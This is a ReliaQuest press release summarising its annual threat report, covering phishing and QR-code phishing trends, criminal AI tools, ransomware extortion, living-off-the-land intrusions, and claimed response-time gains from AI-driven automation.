AI and automation have helped organizations respond to security incidents up to 99% faster than last year, according to new study from ReliaQuest
March 2024 by ReliaQuest
The majority of cyber-attacks against organizations are perpetrated via social engineering of employees, and criminals are using new methods
including AI to supercharge their techniques. This is according to the ReliaQuest Annual Threat Report, which contains in-depth analysis of key security incidents and research from the past year, offering insights into the threats that organizations face.
Some 71% of all attacks trick employees via the use of phishing, and of particular concern is a sharp rise in QR code phishing, which increased 51% last year compared to
the previous eight months. Employees are also being duped into downloading fake updates – often to their web browser. Drive-by compromise has been traditionally defined as the automatic download of a malicious file from a compromised website without user interaction.
However, in most cases reviewed during the reporting period, user action was involved—facilitating initial access in nearly 30% of incidents.
The use of AI to accelerate these attacks is gaining significant attention among major cybercriminal forums with growing interest in weaponizing this technology. ReliaQuest
has found dedicated AI and machine-learning sections of these sites, which detail criminal alternatives to mainstream chatbots, such as FraudGPT and WormGPT, and hint at the development of simple malware and distributed denial of service (DDoS) queries using
these options. AI systems can now replicate a voice using a sample, and video-call deepfakes are aiding threat actors. Additionally, ReliaQuest has noted that a growing number of threat actors are automating various stages of their attacks, or the entire attack
chain – particularly the Citrix Bleed exploitation.
However, while AI-powered automation is being leveraged by attackers, it has also delivered a step change in defensive capabilities among organizations. AI-enabled automated
workflows have allowed ReliaQuest customers to respond to threats within minutes rather than days. For example, while ReliaQuest customers utilizing traditional approaches saw a Mean Time to Respond (MTTR) of an average of 2.3 days, organizations who opted
to leverage some level of AI and automation saw a reduction to 58 minutes: a 99% decrease from 2022. Even more encouraging, customers who fully leveraged AI and automation are seeing reductions of MTTR down to 7 minutes or less.
Financial theft stood out as the primary objective of criminals in 2023, driving 88% of customer incidents. Extortion activity increased by 74%, with a record 4,819 compromised
entities named on data-leak websites from ransomware groups, with LockBit alone accounting for 1,000-plus entities.
ReliaQuest noted a significant threat from suspected nation state actors using so-called ’living off the land’ (LotL) techniques. In such incidents threat actors seek to
hide their activity via defense-evasion techniques, such as log clearing and infiltrating PowerShell. In an intrusion ReliaQuest observed in April 2023, a Chinese state-sponsored threat group primarily focused on using LotL commands to blend into a company’s
environment. The group’s discreet LotL activity allowed access for more than a month.
Michael McPherson, ReliaQuest’s Senior Vice President of Technical Operations said: "As the threat continues to evolve, defenders must stay agile, using AI and automation
to keep pace with the latest attack techniques. Time is the enemy in cybersecurity. To proactively protect against these risks, companies should maximize visibility across their networks and beyond the endpoint, fully leverage AI and automation to better understand
and use their own data, and equip their teams with the latest threat intelligence, as outlined in our recommendations. With this approach, in the next year we expect customers who fully leverage our AI and automation capabilities to contain threats within
5 minutes or less."
The ReliaQuest Annual Threat Report contains detailed remediation advice, including specific sections on stopping Business Email Compromise (BEC) attempts, ransomware attacks,
as well as social engineering and multifactor authentication (MFA) abuse. There are also sections on preventing malware-free activity, as well as staying on top of the latest tactics, techniques and procedures (TTPs).